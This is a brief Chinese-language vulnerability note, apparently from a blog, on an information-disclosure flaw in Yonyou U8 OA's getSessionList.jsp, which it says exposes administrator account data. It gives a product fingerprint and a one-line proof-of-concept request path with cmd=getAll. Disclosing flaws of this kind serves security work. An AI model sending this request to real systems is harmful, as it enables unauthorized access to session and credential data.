Yonyou U8 OA getSessionList.jsp文件,通过漏洞攻击者可以获取数据库中管理员的账户信息
Yonyou U8 OA
"YonyouU8-OA"
登录页面
验证POC
/yyoa/ext/https/getSessionList.jsp?cmd=getAll
456 篇文章
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!